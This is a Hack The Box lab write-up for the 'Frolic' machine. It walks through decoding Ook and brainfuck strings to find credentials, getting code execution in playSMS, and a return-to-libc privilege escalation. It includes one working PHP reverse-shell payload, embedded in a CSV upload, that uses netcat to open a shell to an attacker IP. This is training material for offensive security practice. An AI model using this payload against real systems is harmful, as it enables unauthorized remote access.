Overview
Frolic was a box with few ports and provided a straight forward path with multiple options to remote code execution after finding credentials to the playsms directory which first required the identification and decoding of some esoteric languages. The privilege escalation portion had a buffer overflow in an SUID binary that we could call with a return2libc attack.
Summary
dir bust over http port 9999
Find an decrypt a series of strings from the found directories
login to the playsms page
exploit playsms with CV upload to RCE
Locate rop binary with SUID permissions
Enumerate and craft a payload
Tools/Blogs used
ook decoder
cyberchef
GDB-python exploit development
Lessons learned
Do not be afraid of ROP binary exploits, they are more straight forward than fist appears.
There is nothing wrong with retracing your steps or restarting the machine
Enumeration
As always we start off with simple enumeration.
SMB Enumeration
This is common to see in easy rated hack the box machines. Quite often it can allow for an anonymous bind with the smbclient module built into Kali linux.
Port 9999 http
Visiting the server over http port 9999 provides a connection error.
Checking for directories with OWASP dir buster providers many directories.
We start checking them all with the dev page up first.
/dev provides a broken page so it is on to the next.
/admin page provides us with a potential entry point.
This is common within Hack the box, an admin login page especially on easy machines and it is usually representative of a way in. So let us make a note of this and check back if we come across some credentials later.
I spent time reviewing every line of this page and fell down a few rabbit holes before re-calibrating my efforts.
At this point I have been through all our directories with just an initial look over and nothing of value was found. Generally speaking when it comes to a hack the box engagement you can be sure that if only a few ports on the machine are open, and this includes identified web directories we usually have to focus there.
Finally I checked the source code of the admin login page and located credentials that allowed me to login.
Well unfortunately we were presented with this unusual pattern of characters.
Although I had no idea what this was initially, some research on the character set revealed that we were dealing with an esoteric encoding format known as ook, Armed with this information we are able to decode this ook with the decode fr tool.
With this secret we are moving closer to the finish line.
Do the obvious
Browsing to this odd directory provides us another cryptic page with what appears to be base 64.encoding.
I was in for a surprise when I decoded the information and received garbled text. Dismissing this garbled text sent me down a rabbit hole before I returned for closer analysis of the garbled characters. Upon further inspection I realized we may of been looking at raw data, and the base 64 was actually a decoded file. So I proceeded to rebuild the original data with the linux native base64 module.
Performing this function provided me with an error suggesting our input was invalid. After reviewing the base 64 code I noticed some spaces existed between the characters. So I tried removing the spaces and I was able to rebuild the base64. We then run file on our target and see that it is indeed a zip file.
Upon trying to unzip I was not able to extract the files without a password. At first I stared blankly at the screen as I mentally retraced my steps and considered all possible clues along the way. Then I tried the password "password" and it worked :). I can confidentially say that this never happens on hack the box machines so I was lucky.
We can see the file deflated into index.php which we had seen in the initial base64 when we attempted to decode. Looking inside index.php yields hex code.
Converting this code to text provides us with base64 encoded characters. Decoding these characters provides us with brainF&*k. Utilizing decode fr we are able to decode this and receive a suggested password.
Back to square #1
At this point I was at a loss and started my process from scratch interestingly enough, while reviewing all the domains from dir busting I actually loaded the dev/backup folder with some text. This was odd as the first time it just showed as a broken page.
We find the suggested /playsms page and login with the previous password and the username admin. Although we can exploit this website by manually uploading code, I auto launched the exploit from metasploit instead, but will include both ways to gain remote code execution in this guide.
Remote code execution - metasploit
Loading up metasploit and searching for known play sms exploits provided me with three options.
It was finally number 3 that worked of the bunch.
Remote code execution - manually
The second way is to login to the webpage and upload a text file with the csv extention containing the following code which can be found if researching for CSV reverse shell code.
Name,Mobile,Email,Group code,Tags <?php $t="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.33 6363 >/tmp/f"; system($t); ?>,12,344,56,67
User flag
From here we cap our flag.
Root
I uploaded linux enum and it pointed out several suid files, however one of them stood out to me, in particular the "rop" file. Which if you do not know, rop stands for return oriented programming. I downloaded the file and proceeded to investigate.
When it come to rop exploit, I know from experience the goal is is to call /bin/sh to pop a shell
I am not going to dive in on how binary exploitation works, but just a quick summary on solving this rop challenge.
We review the binary after setting a break point and are able to retrieve the memory addresses of system, exit, libc and /bin/sh.
Now we receive the flag and complete the machine :)